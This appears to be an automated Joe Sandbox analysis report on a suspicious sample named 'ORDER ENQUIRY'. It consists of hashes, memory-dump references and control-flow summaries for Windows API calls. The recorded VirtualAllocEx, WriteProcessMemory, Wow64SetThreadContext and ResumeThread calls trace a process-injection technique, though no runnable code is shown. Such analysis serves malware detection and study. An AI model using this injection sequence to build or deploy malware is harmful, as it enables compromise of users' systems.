                                                                                                                                                                          • Opcode ID: 5ef451d411d7a4e118d1064369651b4cfe5e9cabff65546ff0c9858591a7eab3
                                                                                                                                                                          • Instruction ID: 36417aa8619fd781547421c11e1c430760800d781447d7918dd052965f3b4824
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ef451d411d7a4e118d1064369651b4cfe5e9cabff65546ff0c9858591a7eab3
                                                                                                                                                                          • Instruction Fuzzy Hash: 487123B0A00B058FD728DF2AD45875ABBF1FF88304F008A2DD49ADBA54D775E949CB90

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 708 15e590c-15e5916 709 15e5918-15e59d9 CreateActCtxA 708->709 711 15e59db-15e59e1 709->711 712 15e59e2-15e5a3c 709->712 711->712 719 15e5a3e-15e5a41 712->719 720 15e5a4b-15e5a4f 712->720 719->720 721 15e5a60 720->721 722 15e5a51-15e5a5d 720->722 724 15e5a61 721->724 722->721 724->724
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 015E59C9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                          • Opcode ID: c0b2d2f25837471e1ad2260a4b3b64b0f795c9b4cd973f36a62781977dc192ad
                                                                                                                                                                          • Instruction ID: b716f06ae8d820f5de11b1ff06975a1e7d2d86f7211e74a4acf3c042881912a8
                                                                                                                                                                          • Opcode Fuzzy Hash: c0b2d2f25837471e1ad2260a4b3b64b0f795c9b4cd973f36a62781977dc192ad
                                                                                                                                                                          • Instruction Fuzzy Hash: EB41E1B4C00719CFDB28DFA9C888ADDBBF5BF49304F20806AD418AB255DB756946CF90

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 725 15e449c-15e59d9 CreateActCtxA 728 15e59db-15e59e1 725->728 729 15e59e2-15e5a3c 725->729 728->729 736 15e5a3e-15e5a41 729->736 737 15e5a4b-15e5a4f 729->737 736->737 738 15e5a60 737->738 739 15e5a51-15e5a5d 737->739 741 15e5a61 738->741 739->738 741->741
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 015E59C9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                          • Opcode ID: 766ef11c9c3661d0478cabd22a85b6878962d2cab140502aa1ed42d30e7ebb5f
                                                                                                                                                                          • Instruction ID: 106f9b01f426fd93e6a5d5aa63d4af77e7189072d8089a90c2fbefae1236bc35
                                                                                                                                                                          • Opcode Fuzzy Hash: 766ef11c9c3661d0478cabd22a85b6878962d2cab140502aa1ed42d30e7ebb5f
                                                                                                                                                                          • Instruction Fuzzy Hash: 9541B2B4C0071DCBDB28DFA9C988A9DBBF5BF49304F20806AD418AB255DB755945CF90

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 742 7733909-773395e 745 7733960-773396c 742->745 746 773396e-77339ad WriteProcessMemory 742->746 745->746 748 77339b6-77339e6 746->748 749 77339af-77339b5 746->749 749->748
                                                                                                                                                                          APIs
                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077339A0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                                          • Opcode ID: dbc6b0f21dd08f576b84771721b153dc2820823f3527cb561e090c31a9af8e7a
                                                                                                                                                                          • Instruction ID: 6051d66037fae3a895312c30bbfb6149ce39117041a371b379d690f71b638fe2
                                                                                                                                                                          • Opcode Fuzzy Hash: dbc6b0f21dd08f576b84771721b153dc2820823f3527cb561e090c31a9af8e7a
                                                                                                                                                                          • Instruction Fuzzy Hash: E33123B19002499FCB10CFAAC884BEEBFF5EF49314F10842AE958A7241C7799945CBA0

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 753 7733910-773395e 755 7733960-773396c 753->755 756 773396e-77339ad WriteProcessMemory 753->756 755->756 758 77339b6-77339e6 756->758 759 77339af-77339b5 756->759 759->758
                                                                                                                                                                          APIs
                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077339A0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                                          • Opcode ID: 715672a78e6b6f98b1fd468a25351d558a087655179e42d9bc9388cfcfa8150c
                                                                                                                                                                          • Instruction ID: afbbdcd03af671bacb38356a191207449bce5ffa21726fd9a05fb6bc4d6f5ed0
                                                                                                                                                                          • Opcode Fuzzy Hash: 715672a78e6b6f98b1fd468a25351d558a087655179e42d9bc9388cfcfa8150c
                                                                                                                                                                          • Instruction Fuzzy Hash: 972127B5900309DFCB10DFAAC885BEEBBF5FF48314F108429E959A7241C7789944CBA0

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 763 7733770-77337c3 766 77337d3-7733803 Wow64SetThreadContext 763->766 767 77337c5-77337d1 763->767 769 7733805-773380b 766->769 770 773380c-773383c 766->770 767->766 769->770
                                                                                                                                                                          APIs
                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077337F6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                                          • Opcode ID: 4cd0b2447c839ecd30a2be355fe61cb1b1b8046abe61fca4e6959370c2d47cb2
                                                                                                                                                                          • Instruction ID: 25e4fa479d539938733968e77dd1e1cab7ed42de905d550e51d9fa4ee95c917b
                                                                                                                                                                          • Opcode Fuzzy Hash: 4cd0b2447c839ecd30a2be355fe61cb1b1b8046abe61fca4e6959370c2d47cb2
                                                                                                                                                                          • Instruction Fuzzy Hash: D52157B5D002099FDB10DFAAC4857EEBFF4EF49324F10842AD459AB241CB789945CFA1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 774 77339f8-7733a8d ReadProcessMemory 778 7733a96-7733ac6 774->778 779 7733a8f-7733a95 774->779 779->778
                                                                                                                                                                          APIs
                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07733A80
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                                          • Opcode ID: 094d56849618190c5407b4ae9f43dee3fa09b45d06613a2b03898be3cb6991e1
                                                                                                                                                                          • Instruction ID: 916443acb4936855a8348ed51d0c7d0764b5e1be624ee9e145e315420ffb038a
                                                                                                                                                                          • Opcode Fuzzy Hash: 094d56849618190c5407b4ae9f43dee3fa09b45d06613a2b03898be3cb6991e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 592125B1C002599FCB10DFAAC884AEEFBF5FF48320F10842AE559A7250D7799945CBA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED787
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                          • Opcode ID: 9df93a413c0d7e42138d4794026b065fe929a4e8838ed435ce328d034a3a615f
                                                                                                                                                                          • Instruction ID: fc760d28b49760c3a6398e7a99e959415c5634c082d49502024d20786cc75c18
                                                                                                                                                                          • Opcode Fuzzy Hash: 9df93a413c0d7e42138d4794026b065fe929a4e8838ed435ce328d034a3a615f
                                                                                                                                                                          • Instruction Fuzzy Hash: E421E0B59002489FDB10CFAAD984AEEBFF5FB48310F14845AE918A7350C378A944CFA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077337F6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                                          • Opcode ID: bf1bc3eec8b9d41a386ff431121f3a57d2858cd5f2e2ac4e6303b121c5683231
                                                                                                                                                                          • Instruction ID: 6dd73454ab40d2f75d61902d96821d060ef9d913c8c01ef724832fc6b8bc9b74
                                                                                                                                                                          • Opcode Fuzzy Hash: bf1bc3eec8b9d41a386ff431121f3a57d2858cd5f2e2ac4e6303b121c5683231
                                                                                                                                                                          • Instruction Fuzzy Hash: 102135B5D002099FDB10DFAAC4857EEBBF4EF49310F10842AD419A7241CB78A945CFA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07733A80
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                                          • Opcode ID: 087f90582dd996e3d05c3b292e912709d631af84d3e5612225e3928683bd431b
                                                                                                                                                                          • Instruction ID: 32b56d7e9c5405097070bea86d2736b08bb59734b2ad60d2f122d559cd13b630
                                                                                                                                                                          • Opcode Fuzzy Hash: 087f90582dd996e3d05c3b292e912709d631af84d3e5612225e3928683bd431b
                                                                                                                                                                          • Instruction Fuzzy Hash: 702137B1C003499FCB10DFAAC884AEEFBF5FF48310F10842AE519A7250C7389940CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED787
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                          • Opcode ID: 0d1193519d61726430e3610bbbe64dc1f04e0fc4e2a7bfc30e8f0db5f47619f0
                                                                                                                                                                          • Instruction ID: f1b5bc57ef5438d593b38d64748fbdce082c82f88b390fbdc22f6375b6507495
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d1193519d61726430e3610bbbe64dc1f04e0fc4e2a7bfc30e8f0db5f47619f0
                                                                                                                                                                          • Instruction Fuzzy Hash: B021B0B59002489FDB10CFAAD984ADEBBF9FB48310F14841AE918A7250D379A944CFA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077338BE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                          • Opcode ID: 775a006fdc4ca24e1e8f8054f1b4f3a7f667c974fa62eb2bb89caa4b4174cff3
                                                                                                                                                                          • Instruction ID: 76547be7d6410a7325d1f4feb1a2b90352e9adb6f9ab2582e5468cb5492e296d
                                                                                                                                                                          • Opcode Fuzzy Hash: 775a006fdc4ca24e1e8f8054f1b4f3a7f667c974fa62eb2bb89caa4b4174cff3
                                                                                                                                                                          • Instruction Fuzzy Hash: 192147B58002499FCB20DFAAC845BEEFFF5EF48324F148819E559A7250CB399584CBA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077338BE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                          • Opcode ID: 73a06385366762f616f36fba63508da0b5cece2e4453d78a0fa9ab958ad0af6d
                                                                                                                                                                          • Instruction ID: db41c06b1ce43a0557e9ad38605e3c8cc880015d3c58878092e8721e4090ccb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 73a06385366762f616f36fba63508da0b5cece2e4453d78a0fa9ab958ad0af6d
                                                                                                                                                                          • Instruction Fuzzy Hash: 4E1107B59002499FCB20DFAAC845AEEFFF5EF48314F148829E519A7250CB79A544CFA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0773635D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                                          • Opcode ID: 51555e0ba8e9ba37a8f921a0d3faa11c66a5f0a320240accbc039a7cc66b0013
                                                                                                                                                                          • Instruction ID: a4e6304061d78c6f5c276f0dd689d17357989445d23776ea96793c0efdc56eff
                                                                                                                                                                          • Opcode Fuzzy Hash: 51555e0ba8e9ba37a8f921a0d3faa11c66a5f0a320240accbc039a7cc66b0013
                                                                                                                                                                          • Instruction Fuzzy Hash: A21125B58003889FDB10DF9AD589BDEFFF8EB49310F20885AD558A7241C379A544CFA5
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                          • Opcode ID: 1350530bdecbd985672da207ae34bfc8e65360ed663753a59a7d5ab204e59e3f
                                                                                                                                                                          • Instruction ID: 199ea2b03b26be3a9920f238308801655501bbae2ad8ea3c665d83cded1c4764
                                                                                                                                                                          • Opcode Fuzzy Hash: 1350530bdecbd985672da207ae34bfc8e65360ed663753a59a7d5ab204e59e3f
                                                                                                                                                                          • Instruction Fuzzy Hash: 881146B5C002498FCB20DFAAC5457EEFBF4EF48310F24881AC459AB250CB38A545CFA1
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                          • Opcode ID: b3a7dacd5651f5840ab47a803761751ff70c4d6953f2fd608102870329655bc8
                                                                                                                                                                          • Instruction ID: 35e0fb8ff350dce895d069bec3e2e7344c186e917220be84d7df98e8137c7e67
                                                                                                                                                                          • Opcode Fuzzy Hash: b3a7dacd5651f5840ab47a803761751ff70c4d6953f2fd608102870329655bc8
                                                                                                                                                                          • Instruction Fuzzy Hash: FE1125B19002498FCB20DFAAC4457AEFBF5EF88324F208819D519A7240CB79A944CBA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0773635D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                                          • Opcode ID: 7f8f186ec7f051677f92fafb2c81578d93cadaf1e541be1f85a1d1a46c7523da
                                                                                                                                                                          • Instruction ID: fe5e6410f1a28362a9054e2726499eb807de588a2e2f86f69d00bde16e6fcbab
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f8f186ec7f051677f92fafb2c81578d93cadaf1e541be1f85a1d1a46c7523da
                                                                                                                                                                          • Instruction Fuzzy Hash: CF1103B5800349AFDB10DF9AC984BDEFBF8EB49310F10841AE558B7201C379A944CFA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 015EB07E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                          • Opcode ID: 65a8ddbb3d312522964a1549b83feacafd25c24f7c34279d30d009c98ccb2216
                                                                                                                                                                          • Instruction ID: 09c2332c2f4aaabed5cc01a7a9ad58a88f5b34e6e3f3aa05c8dd6e79afd2bda6
                                                                                                                                                                          • Opcode Fuzzy Hash: 65a8ddbb3d312522964a1549b83feacafd25c24f7c34279d30d009c98ccb2216
                                                                                                                                                                          • Instruction Fuzzy Hash: 6511DFB6C006498FDB24DF9AC448A9EFBF4EB88224F10845AD529A7610D379A645CFA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07738041,?,?), ref: 077381E8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: 7407ce9a712ee072bd24d0dc2332e6bea03fd5b693007a6d0ed0ea1a9c878e7d
                                                                                                                                                                          • Instruction ID: e2da70ac4056f0409e1e18c691360138442dfd22039577800afe4626d06738e9
                                                                                                                                                                          • Opcode Fuzzy Hash: 7407ce9a712ee072bd24d0dc2332e6bea03fd5b693007a6d0ed0ea1a9c878e7d
                                                                                                                                                                          • Instruction Fuzzy Hash: 861136B5800749DFCB20DF9AC545BEEBBF4EB48320F10885AE558A7341D738A944CFA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07738041,?,?), ref: 077381E8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: 6d3e2b815d135f4ca14a279c8e779554485c4de298cd952dc5580f8baf145eb2
                                                                                                                                                                          • Instruction ID: 35a2d2db6e22957a87cf494dda3e8a69a5f03b092143dc71f41e771f7fc3ed45
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d3e2b815d135f4ca14a279c8e779554485c4de298cd952dc5580f8baf145eb2
                                                                                                                                                                          • Instruction Fuzzy Hash: 601136B5800749DFCB20DF9AC544BEEBBF4EB48320F10881AE958A7341D738A944CFA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07738041,?,?), ref: 077381E8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: 429cbc3f89d37baee8b9114a8c944c03f831e2b83400833477c0a6a8c43e701c
                                                                                                                                                                          • Instruction ID: 1a74883255b231abc9d0855ff953eba4a851b9a8b393eece921a7db5d55341ee
                                                                                                                                                                          • Opcode Fuzzy Hash: 429cbc3f89d37baee8b9114a8c944c03f831e2b83400833477c0a6a8c43e701c
                                                                                                                                                                          • Instruction Fuzzy Hash: E91136B5800749DFCB20DF9AC544BEEBBF4EB48320F10881AE958A7341D738A944CFA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07738041,?,?), ref: 077381E8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: 8901648d6e42b3ae8ba4e3eff9acf81382dbffda9773477e91c2b8fd7e1ecc29
                                                                                                                                                                          • Instruction ID: e5e6d99f0e673fece391d2dd6776b9150c014dc570d8f7bc25af878153491c0c
                                                                                                                                                                          • Opcode Fuzzy Hash: 8901648d6e42b3ae8ba4e3eff9acf81382dbffda9773477e91c2b8fd7e1ecc29
                                                                                                                                                                          • Instruction Fuzzy Hash: 571125B5800649DFCB20DFAAC544BDEFBF4EB48320F14845AD958A7341C738A944CFA5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2096740919.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_134d000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4038f9fb2df8cbe0e2eb7fd887d8a723fe941ffcbcb774227e90af67032ac074
                                                                                                                                                                          • Instruction ID: 92208e400ddccb8d0b50454cab875c281c205df1533ae519d22ad4138c847dfe
                                                                                                                                                                          • Opcode Fuzzy Hash: 4038f9fb2df8cbe0e2eb7fd887d8a723fe941ffcbcb774227e90af67032ac074
                                                                                                                                                                          • Instruction Fuzzy Hash: AD213671500204DFDB05DF58D9C0B56BFA9FBA8328F20C169E9091B356C73AF416CAA1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2096740919.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_134d000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1a4af3beaa71045eb518469f65275c44b6a5f9b3efb7b2702545b6a023979795
                                                                                                                                                                          • Instruction ID: 4b2939349e828a5598663d3ef97eaaac67ca89fadcf0b150faecc0fdff3927e6
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a4af3beaa71045eb518469f65275c44b6a5f9b3efb7b2702545b6a023979795
                                                                                                                                                                          • Instruction Fuzzy Hash: D4210671500244DFDB05DF58D9C0F26BFA5FB9831CF20C5A9E9090B256C736E416CAE1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2096787414.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_135d000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6302d58d8cd4bbcd598096ccb76a11290587070e8ff44d5922e3be1b5461ba9e
                                                                                                                                                                          • Instruction ID: 116364d80e1f5f598cb49227b55c40f1ce73a67d81f605f02fc81a06b527ca25
